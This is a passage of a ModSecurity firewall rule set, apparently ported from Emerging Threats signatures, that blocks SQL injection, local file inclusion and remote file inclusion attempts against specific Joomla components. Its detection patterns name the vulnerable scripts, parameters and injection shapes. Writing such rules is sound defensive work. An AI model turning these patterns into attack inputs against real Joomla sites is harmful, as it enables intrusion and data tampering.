SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005446) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text INSERT SecRule REQUEST_LINE "@contains /plugins/search/sections.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005446,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005447) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text DELETE SecRule REQUEST_LINE "@contains /plugins/search/sections.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005447,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005448) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text ASCII SecRule REQUEST_LINE "@contains /plugins/search/sections.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005448,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005449) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UPDATE SecRule REQUEST_LINE "@contains /plugins/search/sections.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005449,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:text "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- sections.php text UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005450) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email SELECT SecRule REQUEST_LINE "@contains /database/table/user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005450,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:email "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005451) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UNION SELECT SecRule REQUEST_LINE "@contains /database/table/user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005451,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UNION SELECT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:email "(?i:UNION\s+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UNION SELECT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005452) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email INSERT SecRule REQUEST_LINE "@contains /database/table/user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005452,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email INSERT',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:email "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email INSERT',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005453) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email DELETE SecRule REQUEST_LINE "@contains /database/table/user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005453,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email DELETE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:email "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email DELETE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005454) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email ASCII SecRule REQUEST_LINE "@contains /database/table/user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005454,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email ASCII',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:email "(?i:ASCII\(.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email ASCII',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2005455) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UPDATE SecRule REQUEST_LINE "@contains /database/table/user.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2005455,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UPDATE',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/22122'" SecRule ARGS:email "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! SQL Injection Attempt -- user.php email UPDATE',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2008685) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla DS-Syndicate Component feed_id SQL Injection SecRule REQUEST_LINE "@contains GET " "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008685,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla DS-Syndicate Component feed_id SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6792/'" SecRule REQUEST_LINE "@contains /index2.php?option=ds-syndicate" "chain" SecRule REQUEST_LINE "@contains version=1" "chain" SecRule ARGS:feed_id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla DS-Syndicate Component feed_id SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2008822) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2008822,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/6980/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule REQUEST_LINE "@contains option=com_pro_desk" "chain" SecRule ARGS:include_file "(?i:(\.\.\/){1,})" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Pro Desk Component include_file Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009369) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion SecRule REQUEST_LINE "@contains /admin.rssreader.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009369,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/7096/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:mosConfig_live_site "(?i:mosConfig_live_site=\s*(https?|ftps?|php)\:\/)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla Simple RSS Reader admin.rssreader.php mosConfig_live_site Parameter Remote File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009834) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla portalid Component UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009834,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla portalid Component UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36206/info'" SecRule ARGS:option=com_artportal&portalid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla portalid Component UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009835) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla portalid Component SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009835,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla portalid Component SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36206/info'" SecRule ARGS:option=com_artportal&portalid "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla portalid Component SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009836) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla portalid Component DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009836,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla portalid Component DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36206/info'" SecRule ARGS:option=com_artportal&portalid "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla portalid Component DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009881) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla Com_joomlub Component Union Select SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009881,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla Com_joomlub Component Union Select SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9593/'" SecRule ARGS:option=com_joomlub&controller=auction&view=auction&task=edit&aid "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla Com_joomlub Component Union Select SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009913) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS joomla com_djcatalog component SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009913,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS joomla com_djcatalog component SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9693/'" SecRule ARGS:option=com_djcatalog&view=showItem&id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS joomla com_djcatalog component SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009914) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS joomla com_djcatalog component DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009914,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS joomla com_djcatalog component DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9693/'" SecRule ARGS:option=com_djcatalog&view=showItem&id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS joomla com_djcatalog component DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009915) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS joomla com_djcatalog component INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009915,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS joomla com_djcatalog component INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9693/'" SecRule REQUEST_LINE "@contains INSER" "chain" SecRule ARGS:option=com_djcatalog&view=showItem&id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS joomla com_djcatalog component INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009916) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS joomla com_djcatalog component UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009916,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS joomla com_djcatalog component UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9693/'" SecRule ARGS:option=com_djcatalog&view=showItem&id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS joomla com_djcatalog component UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009917) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS joomla com_djcatalog component UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009917,rev:5,msg:'SLR: ET WEB_SPECIFIC_APPS joomla com_djcatalog component UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9693/'" SecRule ARGS:option=com_djcatalog&view=showItem&id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS joomla com_djcatalog component UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009919) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component 'id' Parameter SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009919,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36427/info'" SecRule ARGS:option=com_jlord_rss&task=feed&id "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009920) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component 'id' Parameter DELETE FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009920,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter DELETE FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36427/info'" SecRule ARGS:option=com_jlord_rss&task=feed&id "(?i:DELETE.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter DELETE FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009921) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component 'id' Parameter UNION SELECT SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009921,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter UNION SELECT SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36427/info'" SecRule ARGS:option=com_jlord_rss&task=feed&id "(?i:UNION.+SELECT)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter UNION SELECT SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009924) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component 'id' Parameter INSERT INTO SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009924,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter INSERT INTO SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36427/info'" SecRule ARGS:option=com_jlord_rss&task=feed&id "(?i:INSERT.+INTO)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter INSERT INTO SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009922) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component 'id' Parameter UPDATE SET SQL Injection SecRule REQUEST_LINE "@contains /index.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009922,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter UPDATE SET SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36427/info'" SecRule ARGS:option=com_jlord_rss&task=feed&id "(?i:UPDATE.+SET)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Foobla RSS Feed Creator Component \'id\' Parameter UPDATE SET SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009929) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt SecRule ARGS_NAMES "(?i:target)" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009929,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/9706/'" SecRule REQUEST_LINE "@contains /index.php?option=com_album&" "chain" SecRule REQUEST_LINE "@contains Itemid=128&" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Joomla! com_album Component Local File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009933) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Possible Mambo/Joomla! com_koesubmit Component 'koesubmit.php' Remote File Inclusion Attempt SecRule REQUEST_LINE "@contains /com_koesubmit/koesubmit.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009933,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Possible Mambo/Joomla! com_koesubmit Component \'koesubmit.php\' Remote File Inclusion Attempt',tag:'web-application-attack',tag:'url,www.owasp.org/index.php/PHP_File_Inclusion'" SecRule QUERY_STRING|REQUEST_BODY "(?i:\x2Ephp\x3F.{0,300}\x3D(http\x3A|ftp\x3A|https\x3A|ftps\x3A))" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Possible Mambo/Joomla! com_koesubmit Component \'koesubmit.php\' Remote File Inclusion Attempt',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009934) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion SecRule REQUEST_LINE "@contains /components/com_moofaq/includes/file_includer.php" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009934,rev:4,msg:'SLR: ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion',tag:'web-application-attack',tag:'url,www.exploit-db.com/exploits/8898/'" SecRule REQUEST_LINE "@contains GET " "chain" SecRule ARGS:file "@contains ../" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Ideal MooFAQ Joomla Component file_includer.php file Parameter Local File Inclusion',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009938) SpiderLabs Research (SLR) Public Vulns: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component SELECT FROM SQL Injection SecRule REQUEST_LINE "@contains /index.php?option=com_surveymanager" "chain,phase:2,block,t:none,t:urlDecodeUni,t:htmlEntityDecode,t:normalisePathWin,capture,logdata:'%{TX.0}',severity:'2',id:2009938,rev:3,msg:'SLR: ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component SELECT FROM SQL Injection',tag:'web-application-attack',tag:'url,www.securityfocus.com/bid/36464/info'" SecRule REQUEST_LINE "@contains task=editsurvey&" "chain" SecRule QUERY_STRING|REQUEST_BODY "(?i:SELECT.+FROM)" "ctl:auditLogParts=+E,setvar:'tx.msg=ET WEB_SPECIFIC_APPS Joomla! Survey Manager Component SELECT FROM SQL Injection',setvar:tx.anomaly_score=+%{tx.critical_anomaly_score},setvar:'tx.%{rule.id}-WEB_ATTACK-%{rule.severity}-%{rule.msg}-%{matched_var_name}=%{matched_var}'" # (2009939) SpiderLabs Research (SLR) 